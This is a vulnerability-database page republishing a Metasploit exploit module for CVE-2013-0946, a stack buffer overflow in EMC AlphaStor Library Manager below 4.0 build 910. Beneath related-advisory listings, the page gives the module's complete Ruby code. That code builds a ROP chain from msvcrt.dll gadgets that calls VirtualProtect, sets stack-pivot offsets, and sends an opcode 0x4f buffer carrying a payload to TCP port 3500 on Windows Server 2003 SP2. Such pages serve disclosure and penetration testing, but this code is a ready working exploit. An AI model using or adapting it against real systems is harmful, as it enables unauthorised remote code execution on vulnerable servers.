Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)

🗓️ 14 Sep 2017 00:00:00Reported by James FittsType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 31 Views

EMC AlphaStor Library Manager Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
Check Point Advisories		EMC AlphaStor Library Control Program Multiple Buffer Overflows (CVE-2013-0946)
2 Jun 201300:00
checkpoint_advisories
Check Point Advisories		EMC AlphaStor Library Control Program Multiple Buffer Overflows (CVE-2013-0946)
25 Aug 201300:00
checkpoint_advisories
CVE		CVE-2013-0946
10 May 201310:00
cve
Cvelist		CVE-2013-0946
10 May 201310:00
cvelist
exploitpack		EMC AlphaStor Library Manager 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)
14 Sep 201700:00
exploitpack
NVD		CVE-2013-0946
10 May 201311:42
nvd
Packet Storm		EMC AlphaStor Library Manager Opcode 0x4f Buffer Overflow
14 Sep 201700:00
packetstorm
Prion		Buffer overflow
10 May 201311:42
prion
securityvulns		ESA-2013-037: EMC AlphaStor Buffer Overflow Vulnerability
10 May 201300:00
securityvulns
securityvulns		EMC AlphaStor buffer overflow
10 May 201300:00
securityvulns
Rows per page
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'EMC AlphaStor Library Manager Opcode 0x4f',
			'Description'    => %q{
				This module exploits a stack based buffer overflow found in EMC
				Alphastor Library Manager version < 4.0 build 910. The overflow
				is triggered due to a lack of sanitization of the pointers used
				for two strcpy functions.
			},
			'Author'         => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-029/' ],
					[ 'CVE', '2013-0946' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
					'wfsdelay'	=>	1000
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'	=> 160,
					'DisableNops'	=> 'true',
					'BadChars' => "\x00\x09\x0a\x0d",
					'StackAdjustment' => -404,
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
					'Compat'        =>
						{
							'SymbolLookup' => 'ws2ord',
						},
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 
						'Windows Server 2003 SP2 EN', 
							{ 
								# msvcrt.dll
								# add esp, 0c/ retn
								'Ret' => 0x77bdda70, 
							} 
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 13 2014'))

		register_options(
			[
				Opt::RPORT(3500)
			], self.class )
	end

	def exploit
		connect

		p =  "\x90" * 8
		p << payload.encoded

		# msvcrt.dll
		# 96 bytes
		rop = [
			0x77bb2563,	# pop eax/ retn 
      0x77ba1114,	# ptr to kernel32!virtualprotect
      0x77bbf244,	# mov eax, dword ptr [eax]/ pop ebp/ retn
      0xfeedface,
      0x77bb0c86,	# xchg eax, esi/ retn
      0x77bc9801,	# pop ebp/ retn
      0x77be2265,
      0x77bb2563,	# pop eax/ retn
      0x03C0990F,
      0x77bdd441,	# sub eax, 3c0940fh/ retn
      0x77bb48d3,	# pop eax/ retn
      0x77bf21e0,
      0x77bbf102,	# xchg eax, ebx/ add byte ptr [eax], al/ retn
      0x77bbfc02,	# pop ecx/ retn
      0x77bef001,
      0x77bd8c04,	# pop edi/ retn
      0x77bd8c05,
      0x77bb2563,	# pop eax/ retn
      0x03c0984f,
      0x77bdd441,	# sub eax, 3c0940fh/ retn
      0x77bb8285,	# xchg eax, edx/ retn
      0x77bb2563,	# pop eax/ retn
      0x90909090,
      0x77be6591,	# pushad/ add al, 0efh/ retn
		].pack("V*")

		buf = Rex::Text.pattern_create(514)
		buf[0, 2] =  "O~"											# opcode
		buf[13, 4] = [0x77bdf444].pack('V')		# stack pivot 52
		buf[25, 4] = [target.ret].pack('V')		# stack pivot 12
		buf[41, 4] = [0x77bdf444].pack('V')		# stack pivot 52
		buf[57, 4] = [0x01167e20].pack('V')		# ptr
		buf[69, rop.length] = rop
		buf[165, 4] = [0x909073eb].pack('V')	# jmp $+117
		buf[278, 4] = [0x0116fd59].pack('V')	# ptr
		buf[282, p.length] = p
		buf[512, 1] = "\x00"

		# junk
		buf << "AAAA"
		buf << "BBBB"
		buf << "CCCC"
		buf << "DDDD"

		print_status("Trying target %s..." % target.name)

		sock.put(buf)

		handler
		disconnect
	end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Sep 2017 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 29.3
EPSS0.56445
emc alphastorlibrary managerbuffer overflowstack basedlack of sanitizationremote exploitwindows server 2003 sp2 encve-2013-0946zdi-14-029metasploit
31